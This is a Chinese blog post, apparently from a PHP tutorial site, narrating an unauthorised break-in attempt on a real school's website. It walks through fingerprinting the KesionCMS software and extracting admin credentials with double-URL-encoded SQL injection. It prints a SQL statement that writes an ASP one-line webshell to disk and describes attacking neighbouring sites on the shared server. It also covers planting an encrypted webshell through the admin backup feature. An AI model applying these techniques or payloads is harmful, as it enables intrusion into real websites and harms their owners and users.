来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] 起因很简单咋QQ邮箱的订阅里收到了此消息00后白富美啊```让咱这90后没有对象的屌丝情何以堪```打开后看到了她们学校XX实验学校(我们是本着学习的态度,全程打码。)百度之``网站是...
起因很简单咋QQ邮箱的订阅里收到了此消息 00后白富美啊```让咱这90后没有对象的屌丝情何以堪``` 打开后看到了她们学校 XX实验学校…(我们是本着学习的态度,全程打码。) 百度之`` 网站是www.****.cn IIS/6.0 网站生成的是静态页面… 后台我们看下…. 后台是某CMS改的…那这个CMS是什么哪??? 这个是科讯的CMS…我们我知道呐???因为 在网站后台添加8就出现了本来面目``` 我们知道了是科讯的那我们就更好的去利用 百度科讯漏洞 乌云提交的漏洞 哈哈RP 提交时间: 2012-05-22 公开时间: 2012-07-06 具体的:http://www.2cto.com/Article/201207/139333.html 这段代码你可以得到管理帐号和密 这个有说明怎么转码,但是有些人估计还是不懂怎么转码的吧…. 其实这个是二次转码 第一次转码 Union转码后%75%6E%69%6F%6E 第二次转码 二次转码我们是通过 gb2313的 URLENconde 编码 %75%6E%69%6F%6E转码后%2575%256E%2569%256F%256E 这样大家应该懂了如何来回转换的吧~ 那麽我们现在有了帐号密码 但是我们没有认证码 <option value='1|2'>admin|8ae2232b1cd2bd90</option> 认证码是保存在Conn.asp这个文件里面 我们要知道这个文件才可以 也就是说拥有了帐号密码还是不可以的 ---------------------------------------------------------------------------------------- 网站关闭了注册 注册是不行了 有个BBS bbs禁止注册 有BBS后台 By Dvbbs.net 动网的论坛… 啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊 管理员还做了限制那就是防下载 .mdb后缀名 看来管理员管理意识了得啊… 主站希望好渺茫啊```` 还记得刚刚我们找到的一个地址吗 为什么没有想到从这个地方下手 笨蛋 全部默认 你们懂的 看看我们看到了什么… 我们进去了 现在就是拿shell了 直接上大马是没有戏的 因为这个服务器上的站全部智创 你们懂得智创厉害 8.0 拿shell是sql执行语句 正常情况下是 执行代码: 但是执行到第三句…问题有了 这一路我们是死了 还有一个是更简单的 SELECT '<%execute request("a")%>' into [0ldgui] in 'D:\wwwroot\****\wwwroot\8+1.asp(1.asp)' 'excel 8.0;' from 0ldgui 怎么执行都是下面这个 数据库只读
看来在后台拿shell是不行了 即使我们拿到了目标站的认证码估计后台也拿不到shell 旁注也没法提权 主数据库完整路径为: D:\wwwroot\***\wwwroot\8\KS_Data\KesionCMS8.mdb 90sec大牛出了个科讯漏洞应该是可以利用的 但是本机没有安装PHP环境 我们只好旁注… 134个站,搞下来一个就有希望了…. 后台拿到shell 在这里说下过程 后台是有备份的地方 但是有一点那就是没有上传 没有上传的图片我怎么拿的 看到没 数据库竟然是asp 我们是在后台添加加密一句话 然后备份网站 这样就拿到了 但是网站权限很死,没有法子 网站安装有智创没有法子上传大马 上传大马提示防火墙拦截 旁注是死了 网站数据权限是只读,猜测我们及时拿到了认证码也不好拿到shell |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com